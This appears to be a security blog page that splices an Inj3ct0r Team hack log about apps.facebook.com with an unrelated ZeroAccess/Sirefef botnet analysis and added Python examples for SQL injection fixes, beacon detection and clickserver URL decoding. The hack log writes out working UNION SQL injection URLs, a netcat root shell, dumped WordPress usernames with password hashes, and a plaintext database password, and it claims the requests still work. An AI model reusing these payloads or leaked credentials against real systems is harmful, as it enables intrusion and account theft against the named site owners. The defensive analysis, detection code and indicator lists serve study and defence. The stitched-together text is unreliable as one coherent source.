Certified Ethical Hackers Security Analyst Malware Hacking Information | Security is an illusion | Page 3

====================================================

FaceBook's servers were hacked again by Inj3ct0r Team
====================================================
[+] English translation
    Inj3ct0r official website => Inj3ct0r.com
    Inj3ct0r community        => 0xr00t.com
                     __           __      ___
 __            __  /'__`\        /\ \__  /'__`\                
/\_\    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __       ___    ___     ___ ___         
\/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\    /'___\ / __`\ /' __` __`\  
 \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/  __/\ \__//\ \L\ \/\ \/\ \/\ \ 
  \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\ 
   \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/ \/_/\/____/\/___/  \/_/\/_/\/_/
              \ \____/                                          
               \/___/
[0x00] [Introduction]
[0x01] [Search for bugs / crash]
[0x02] [0wner]
[0x03] [Conclusion]
[0x04] [Greetz]
   __             __      __    
 /'__`\         /'__`\  /'__`\  
/\ \/\ \  __  _/\ \/\ \/\ \/\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
 \ \ \_\ \/>  </\ \ \_\ \ \ \_\ \
  \ \____//\_/\_\\ \____/\ \____/
   \/___/ \//\/_/ \/___/  \/___/
          [Introduction]
In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and to close loopholes in the system.
We did not change the main page, did not sell server backups and did not delete files.
We have demonstrated the flaw in the system. Start =] ..
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Sir Zaid, personal RESPECT! y0u helped me write the article and find the vulnerabilities
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
   __             __      _    
 /'__`\         /'__`\  /' \   
/\ \/\ \  __  _/\ \/\ \/\_, \  
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \ 
 \ \ \_\ \/>  </\ \ \_\ \ \ \ \
  \ \____//\_/\_\\ \____/  \ \_\
   \/___/ \//\/_/ \/___/    \/_/
        [Search for bugs / crash]
inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com
...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..
[+] found 13 vulns and 6 warnings
[+] open 31337 port yes
[+] connect...
Brevity is the soul of wit..
inj3ct0r.com@mybox [~]
inj3ct0r.com@host [~]# cd /home
inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com
...attack starting . . . . . . . . . .. . . .. . . . ..
   __             __      ___    
 /'__`\         /'__`\  /'___`\  
/\ \/\ \  __  _/\ \/\ \/\_\ /\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
 \ \ \_\ \/>  </\ \ \_\ \ // /_\ \
  \ \____//\_/\_\\ \____//\______/
   \/___/ \//\/_/ \/___/ \/_____/
              [0wner]
Successful Shell on 31337 port . . . . .
inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337
...............................................................
apps.facebook@host [~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-[0x33]- Proofs
############
# REQUESTS #
############
;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1
;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1
admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1
admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--
admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz
################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php
;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com
politicsapp
5.0.45-log
;===== TABLES
# astro
** app
** oscache
** user
# candukincaid
** wp_commentmeta
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan
# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** postmeta
** posts
** term_relationships
** term_taxonomy
** terms
** usermeta
** users
# countdownapp
** oscache
** user
# crush
** couple
** oscache
** user
# dare
** flag
** game
** item
** user
# friendiq
** oscache
** score
** user
# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user
# hookup
** couple
** neverblue
** oscache
** user
# jauntlet
** user
# loccus
** checkin
** oscache
** user
# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# maps
** place
** user
# martisor
** user
# mediax
** oscache
** user
# mostlikely
** callback
** statement
** statementforuser
** user
# music
** itemforuser
** oscache
** user
# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle
# plans
** attend
** cache
** event
** place
** user
# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user
# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# projectbasecamp
** clicktimeproject
** clicktimereport
** clicktimetask
** idcorrelation
** projectbudget
** taskforuser
** user
# pwnfriends
** photo
** photoforfriend
** photoforuser
** user
# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user
# seeall
** network
** networkforuser
** test2
** userpref
# send
** app
** item
** itemforuser
** neverblue
** user
# supporter
** oscache
** user
# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user
# tomsapps
** ad
** adclick
** app
** contest
** notification
# travelbug
** bug
** bugcache
** user
# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user
# wikitravel
** badmap
** wikitravelimage
** wikitravelpage
---------------------------------------------------------------------------------------------------------------------------------------------------
read /etc/hosts
127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com
----------------------------------
/etc/my.cnf
#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 2
#master-host=69.63.180.15
#master-user=tomkincaid_user
#master-password=tomkincaid123
#master-connect-retry=50
replicate-do-db=miserman
#log-slave-updates
expire_logs_days = 14
goOd =] Nice Hacking old school xD
   __             __      __    
 /'__`\         /'__`\  /'__`\  
/\ \/\ \  __  _/\ \/\ \/\_\L\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
 \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
  \ \____//\_/\_\\ \____/\ \____/
   \/___/ \//\/_/ \/___/  \/___/
           [Conclusion]
There's no 100% security! Be safe, my friends! Watch for vulnerabilities and update promptly! Watch for updates at Inj3ct0r.com (Inj3ct0r Exploit Database)
   __             __   __ __     
 /'__`\         /'__`\/\ \\ \    
/\ \/\ \  __  _/\ \/\ \ \ \\ \   
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_ 
 \ \ \_\ \/>  </\ \ \_\ \ \__ ,__\
  \ \____//\_/\_\\ \____/\/_/\_\_/
   \/___/ \//\/_/ \/___/    \/_/
             [Greetz]
Greetz to all users of Inj3ct0r.com and the 31337 Inj3ct0r Members!
                       31337 Inj3ct0r Members:
cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,
Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..
----------------------------------------------------------------------------------------------
                        Personally h4x0rz:
Sir Zaid (none)
You are good hackers. Respect y0u!
Sir Zaid, thank you for pushing me to write this article and for reporting the vulnerability! Personal Respect to you from Inj3ct0r Team!
Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go to http://inj3ct0r.com/links =]
At the time of publication, all requests still work! Attached images : inj3ct0r.com/facebook_part2.zip
We want to thank the following people for their contribution.
Do not forget to keep track of vulnerabilities at Inj3ct0r.com
H.A.C.K.T.I.V.I.S.M. WIN! =]
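The request pattern in the log above (`issueid=1 and 1=2 UNION SELECT ...`) is a textbook UNION-based SQL injection: the false WHERE clause empties the real result, and the UNION row carries whatever the attacker selects into the page. What follows is an added example, not code from Inj3ct0r or from the affected application, that reproduces the bug class and its fix against an in-memory SQLite database. The schema, the table rows and the function names (`get_issue_vulnerable`, `get_issue_fixed`) are constructed for illustration, the log's MySQL `CONCAT_WS` is rendered with SQLite's `||`, and the `$P$` prefix on the dumped hashes marks WordPress's phpass portable format. Note also that the log's own PATH and BASIC INFO lines show the backend database lived on a DreamHost account (tomkincaid@ps5008.dreamhost.com), not on Facebook's own infrastructure.

```python
import sqlite3

# Constructed in-memory schema that mirrors the two tables the log reads:
# the app's `issue` table and a WordPress-style wp_users table (rows made up).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE issue (issueid INTEGER PRIMARY KEY, title TEXT, body TEXT, votes INTEGER);
        INSERT INTO issue VALUES (1, 'Healthcare', 'Where do you stand?', 42);
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$B-hash-1'), (2, 'lucia', '$P$B-hash-2');
    """)
    return db


def get_issue_vulnerable(db, issueid):
    """The bug class the log exploits: the request parameter is pasted into SQL."""
    sql = f"SELECT issueid, title, body, votes FROM issue WHERE issueid={issueid}"
    return db.execute(sql).fetchall()


def get_issue_fixed(db, issueid):
    """Validate the type, then bind the value so it can never alter the statement."""
    try:
        issueid = int(issueid)
    except (TypeError, ValueError):
        return []
    return db.execute(
        "SELECT issueid, title, body, votes FROM issue WHERE issueid=?", (issueid,)
    ).fetchall()


# The log's first request in SQLite syntax: four columns to match the original
# SELECT, the attacker's data in column 2, and a trailing comment to discard
# whatever the application appends after the parameter.
PAYLOAD = "1 and 1=2 UNION SELECT 1,user_login||':'||user_pass,3,4 FROM wp_users-- "


def leaked_column(rows):
    """Collect column 2 of every returned row, which is where the UNION lands."""
    return sorted(row[1] for row in rows)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", leaked_column(get_issue_vulnerable(db, PAYLOAD)))
    print("fixed:     ", get_issue_fixed(db, PAYLOAD))
```

Against the vulnerable function the payload returns every `login:hash` pair from `wp_users`; the fixed function returns an empty result for the same input because a non-integer never reaches the database, and a genuine id still works because it is bound rather than interpolated.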

ZeroAccess and Sirefef are two common names for the same rootkit. We have been observing ZeroAccess since 2010, but it was hardly a factor back then. Variants observed in 2012 show that it has shifted completely and now operates entirely in user mode. It resides entirely in memory and trojanizes services.exe and other system processes (64-bit and most 32-bit infections).

In June 2012 we saw a new publisher program launched, and from information gleaned from some of the darkest channels on EFNET, top affiliates were earning as much as $300 per 1000 infections and pushing past the $10k/month mark. The updated version of ZA no longer uses kernel-mode drivers, as it did previously, and no longer has hidden file storage either. The affiliate program substitutes its own choices for the results of popular search engines, a form of click fraud, as its means of monetization.

The ZA rootkit has a hardcoded list of 256 P2P IP addresses that it passes on to each infected host, and it transmits data throughout the P2P network non-stop, 24 hours a day, at an average packet interval of one second and a fixed 16-byte packet length. We observed in our lab that each infected host consumed 0.1 Mbit/s, which adds up to about 32 gigabytes a month per infection! Several UDP ports were observed and confirmed for this pattern, and those ports were 15437, 16461, 16464, 16465, 16470 and 16471.

If you capture thirty or so consecutive UDP packets, each with a payload length of 16, sent to unique destination IPs on one of these ports (15437, 16461, 16464, 16465, 16470 or 16471), there is a high probability that ZeroAccess/Sirefef is running amok on the system!

The variation in the ports used for the P2P network segregates the botnets. Research suggests that ports 16470 and 16471 are used by 64-bit infected hosts, which participate in Bitcoin operations, while 16464/16465 have mainly been seen in click fraud on 32-bit machines.
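As an added example that is not part of the original post, the following Python turns the heuristic of the last two paragraphs into a check that runs over `tcpdump -n udp` output: for each source host it looks for thirty consecutive 16-byte UDP datagrams to thirty distinct peers on one of the six ports. Datagrams to other ports are ignored rather than ending a run, a small loosening of "consecutive" so that the DNS lookups an infected host also makes do not hide it; that choice, the function names and the synthetic capture lines are assumptions of this example.

```python
import re
from collections import deque

# UDP ports this post ties to the ZeroAccess P2P network, and the payload size.
ZA_P2P_PORTS = {15437, 16461, 16464, 16465, 16470, 16471}
ZA_PAYLOAD_LEN = 16

# One UDP datagram as printed by `tcpdump -n udp`, e.g.
# 12:00:00.000000 IP 192.168.1.10.49152 > 203.0.113.5.16471: UDP, length 16
LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): UDP, length (?P<length>\d+)$"
)


def parse_udp_line(line):
    """Return (src, dst, dport, payload_length) for a tcpdump UDP line, else None."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return m["src"], m["dst"], int(m["dport"]), int(m["length"])


def find_zeroaccess_beacons(lines, window=30):
    """Flag hosts that send `window` consecutive 16-byte UDP datagrams to
    `window` distinct peers on one ZeroAccess port.

    Datagrams to other ports (DNS, NTP, ...) are skipped rather than breaking
    a run, since an infected host does those too.  A datagram with the wrong
    length, a different ZeroAccess port, or a peer already seen in the run
    ends the run and starts a new one.  Returns {src: (port, run_length)}.
    """
    runs = {}   # src -> deque of (dst, dport) making up the current run
    hits = {}
    for line in lines:
        pkt = parse_udp_line(line)
        if pkt is None:
            continue
        src, dst, dport, length = pkt
        if dport not in ZA_P2P_PORTS:
            continue
        run = runs.setdefault(src, deque())
        if length != ZA_PAYLOAD_LEN or any(d == dst or p != dport for d, p in run):
            run.clear()
        if length == ZA_PAYLOAD_LEN:
            run.append((dst, dport))
        if len(run) >= window:
            hits[src] = (dport, len(run))
    return hits


def constructed_capture():
    """Synthetic tcpdump lines (made up for this example, not a real capture)."""
    lines = []
    # 192.168.1.10 looks infected: 16-byte datagrams to 32 different peers on
    # 16471, with ordinary DNS lookups interleaved.
    for i in range(32):
        lines.append(f"12:00:{i:02d}.000000 IP 192.168.1.10.49152 > 203.0.113.{i + 1}.16471: UDP, length 16")
        if i % 8 == 0:
            lines.append(f"12:00:{i:02d}.500000 IP 192.168.1.10.53211 > 8.8.8.8.53: UDP, length 40")
    # 192.168.1.20 also sends 16-byte datagrams on 16471, but only ever to three peers.
    for i in range(40):
        lines.append(f"12:01:{i:02d}.000000 IP 192.168.1.20.50000 > 198.51.100.{i % 3 + 1}.16471: UDP, length 16")
    # 192.168.1.30 reaches many peers on 16464, but with 60-byte payloads.
    for i in range(40):
        lines.append(f"12:02:{i:02d}.000000 IP 192.168.1.30.50001 > 198.51.100.{i + 10}.16464: UDP, length 60")
    return lines


if __name__ == "__main__":
    for host, (port, count) in find_zeroaccess_beacons(constructed_capture()).items():
        print(f"{host}: {count} consecutive 16-byte datagrams to distinct peers on UDP/{port}")
```

Only the first host is reported: the second reuses three peers, so its run never grows past three, and the third never matches the 16-byte length. The heuristic is the post's "high probability" signal, not proof; a hit should be confirmed on the host (the trojanized services.exe described above) before any response.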

ZeroAccess does not use "typical" C2 servers; most C2 communication is done via UDP on the P2P network, through obfuscated commands. Hidden in that traffic we noticed the same servers time and again: 83.133.123.20 is one of the many IPs the infected host calls back to on UDP port 53, and 195.3.145.57 is called back to on UDP port 123.

The Sirefef.EZ/Sirefef.EU and Sirefef.AE variants have been observed using a special plugin feature to load affiliate clickservers.

The clickserver downloads a list of URLs to redirect the bots to, and the affiliates are paid either a percentage of the revenue earned or a flat rate ($0.30 per infection). Clickservers are used with many different malware infections, which sometimes makes it hard to link them to any specific malware. We have observed these clickservers being loaded by ZeroAccess/Sirefef, ZeuS, Kelihos and FakeAV malware.

To trace the source of the malware from nothing but the GET request, here is an example of a ZeroAccess GET string to a clickserver:

/mfg437RPPwJxdj01LjUmaWQ9YjdjYzFmM2MmYWlkPTMwMzQ4JnNpZD01Jm9zPTUuMS0zMiZmcD0wJmFkPTE=45oIlHWm6w

Decoding this string as base64 gives the following (the unprintable bytes before v= and after ad=1 come from the characters that surround the encoded query):

[~]#  ™ø8ß´O?qv=5.5&id=b7cc1f3c&aid=30348&sid=5&os=5.1-32&fp=0&ad=1ã”u¦

Breaking it down we can see the following:

id=b7cc1f3c (bot identifier?)

aid=30348 (affiliate ID, presumably)

sid=5 (site ID, possibly the advertising site ID; we noticed Voodoo and other domain-parking publishers being used as part of the click fraud, which commonly led back to the Google domain publisher program)

os=5.1-32 (Windows NT 5.1, i.e. Windows XP; the 32 means a 32-bit OS)

Here are some clickserver links we pulled from traffic logs of different ZA/Sirefef infections over time, each followed by its decoded form:

http://217.23.9.139/CsxI66RhMCKfdj01LjUmaWQ9OWNhNTVjZmImYWlkPTMwNDIxJnNpZD0xJm9zPTUuMS0zMiZmcD0wJmFkPTE=54YIlc4z8m

ÌHë¤a0″Ÿv=5.5&id=9ca55cfb&aid=30421&sid=1&os=5.1-32&fp=0&ad=1ç

http://217.23.9.139/ihfe56JEKkfxdj01LjUmaWQ9MmQ3M2NmODcmYWlkPTMwNDIxJnNpZD0yJm9zPTUuMS0zMiZmcD0wJmFkPTE=14UvHcyz8w

ŠÞç¢D*Gñv=5.5&id=2d73cf87&aid=30421&sid=2&os=5.1-32&fp=0&ad=1×…/̳ó

http://217.23.9.139/2faW34Hhhw1Fdj01LjUmaWQ9MmQ3M2NmODcmYWlkPTMwNDIxJnNpZD0yJm9zPTUuMS0zMiZmcD0wJmFkPTE=45xYlu2c7S

Ev=5.5&id=2d73cf87&aid=30421&sid=2&os=5.1-32&fp=0&ad=1

http://217.23.9.139/Axfp58ZMMZCMdj01LjImaWQ9NzMyMTcwN2MmYWlkPTMwNDk0JnNpZD0wJm9zPTUuMS0zMiZmcD0wJmFkPTE=46ovfcvf5c

v=5.2&id=7321707c&aid=30494&sid=0&os=5.1-32&fp=0&ad=1
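As an added example (not the post's own tooling), the following Python decodes these clickserver paths. The decodes printed above show that the path is not clean base64: a run of characters before and after the encoded query decodes to unprintable bytes. Rather than assuming fixed offsets, the decoder tries every 4-character-aligned window of the path, keeps only windows that strictly decode to printable ASCII shaped like a query string, and returns the longest one. The sample URL is the first one quoted in this post; the function names and the query-string check are this example's own.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: the first clickserver URL quoted in this post.
SAMPLE_URL = ("http://217.23.9.139/mfg437RPPwJxdj01LjUmaWQ9YjdjYzFmM2MmYWlkPTMwMzQ4"
              "JnNpZD01Jm9zPTUuMS0zMiZmcD0wJmFkPTE=45oIlHWm6w")

# A decoded candidate must look like a plain query string: lowercase keys,
# '=' after each key, '&' between pairs, nothing else.
QUERY_RE = re.compile(r"^[a-z]+=[^&=]*(?:&[a-z]+=[^&=]*)*$")


def decode_clickserver_path(path):
    """Return the query string hidden inside a clickserver URL path, or None.

    Every 4-character-aligned window of the path is tried with strict base64
    validation, so a window that straddles the '=' padding is rejected and
    the junk before and after the query never decodes to printable text.
    The longest printable, query-shaped decode wins.
    """
    s = path.lstrip("/")
    best = None
    for start in range(len(s)):
        for end in range(start + 4, len(s) + 1, 4):
            try:
                raw = base64.b64decode(s[start:end], validate=True)
                text = raw.decode("ascii")
            except (binascii.Error, UnicodeDecodeError):
                continue
            if text.isprintable() and QUERY_RE.match(text):
                if best is None or len(text) > len(best):
                    best = text
    return best


def parse_clickserver_url(url):
    """Decode a clickserver URL into its v/id/aid/sid/os/fp/ad fields."""
    query = decode_clickserver_path(urlsplit(url).path)
    if query is None:
        return {}
    return dict(parse_qsl(query, keep_blank_values=True))


def describe_os(os_field):
    """Split the os field ('5.1-32') into the NT version string and bitness."""
    nt_version, _, bits = os_field.partition("-")
    return nt_version, int(bits)


if __name__ == "__main__":
    fields = parse_clickserver_url(SAMPLE_URL)
    print(fields)                     # {'v': '5.5', 'id': 'b7cc1f3c', 'aid': '30348', ...}
    print(describe_os(fields["os"]))  # ('5.1', 32)
```

For the URLs listed above this recovers exactly the query strings shown under them, which makes it straightforward to pivot on `aid` (the affiliate) and `id` (the bot) across proxy logs without hand-decoding each request.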

———————

Other known ZeroAccess/Sirefef callbacks and activities:

ZeroAccess.B/Sirefef.P – Last Seen: 8-17-12 (UDP/16471 Beacon)

HTTP requests…
URL:  http://promos.fling.com/geo/txt/city.php
TYPE: GET
UA:   None

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=1&digits=10&siteId=31151618
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)
DNS requests
promos.fling.com (208.91.207.10)
www.google.com (173.194.35.82)
TCP
208.91.207.10:80
213.108.252.185:80
68.97.87.253:16471
UDP
8.8.8.8:53
83.133.123.20:53
117.254.254.254:16471

ZeroAccess.P/SireFef.EW - Last Seen: 8-17-12 (UDP/16464 Beacon)

URL:  http://promos.fling.com/geo/txt/city.php
TYPE: GET
UA:   None

URL:  http://bigfatcounters.com/5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=1&digits=10&siteId=554
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://bigfatcounters.com/5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=2&digits=10&siteId=675
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://bigfatcounters.com/5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=3&digits=10&siteId=685
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://bigfatcounters.com/5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=4&digits=10&siteId=555
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)
TCP connections…
208.91.207.10:80
213.108.252.185:80
99.230.4.251:16464
76.173.180.248:16464
UDP communications…
<MACHINE_DNS_SERVER>:53
8.8.8.8:53 (Google DNS)
194.50.116.54:53
66.85.130.234:53

ZeroAccess.FN/Sirefef.M - Last Seen: 8-15-12 (UDP/16471 Beacon)
URL:  http://promos.fling.com/geo/txt/city.php
TYPE: GET
UA:   None

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=1&digits=10&siteId=31236608
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=2&digits=10&siteId=31236729
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=3&digits=10&siteId=31236739
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=4&digits=10&siteId=31236609
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=5&digits=10&siteId=31236628
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)
URL:  http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
TYPE: GET
UA:   Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)

URL:  http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
TYPE: GET
UA:   Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)

URL:  http://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_cab_ax_sgn.z
TYPE: GET
UA:   Flash Player Seed/3.0
DNS requests…
promos.fling.com (208.91.207.10)
www.google.com (173.194.39.20)
fpdownload.macromedia.com (2.18.34.70)
fpdownload2.macromedia.com (77.67.27.27)
TCP
208.91.207.10:80
213.108.252.185:80
67.184.54.251:16471
2.18.66.70:80
80.239.221.41:80
2.18.34.70:80
UDP
<MACHINE_DNS_SERVER>:53
8.8.8.8:53
83.133.123.20:53
67.184.54.251:16471
195.3.145.57:123

ZeroAccess.ER/Sirefef.P – Last Seen: 6-28-12 – (UDP/16471 Beaconing)

URL:  http://promos.fling.com/geo/txt/city.php
TYPE: GET
UA:   None

URL:  http://livecounter.co/count.php?id=31186432&c=1&d=7&s=0
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)
DNS requests…
promos.fling.com (208.91.207.10)
www.google.com (173.194.69.99)
TCP connections…
208.91.207.10:80
184.172.204.122:80
69.244.121.249:16471
UDP communications…
<MACHINE_DNS_SERVER>:53
8.8.8.8:53
83.133.123.20:53
69.244.121.249:16471
195.3.145.57:123
117.254.254.254:16471
88.254.254.254:16471
75.254.254.254:16471
1.254.254.254:16471
197.253.254.254:16471
190.253.254.254:16471
94.253.254.254:16471
180.252.254.254:16471
95.252.254.254:16471
88.252.254.254:16471
79.251.254.254:16471
201.250.254.254:16471

ZAccess.CV - Last Seen: 3-22-2012 (UDP/16470 Beacon)

------

On August 13th, 2012, the students of two major East Coast US universities were back in session, and network admins were simply not prepared for what the students had brought onto their networks. They reported over 850 different student computers all beaconing at the same time, making the universities participants in the ZeroAccess peer botnet. The total bandwidth reportedly consumed by the ZeroAccess botnet at these two campuses within 24 hours was 1.59 terabits!

——-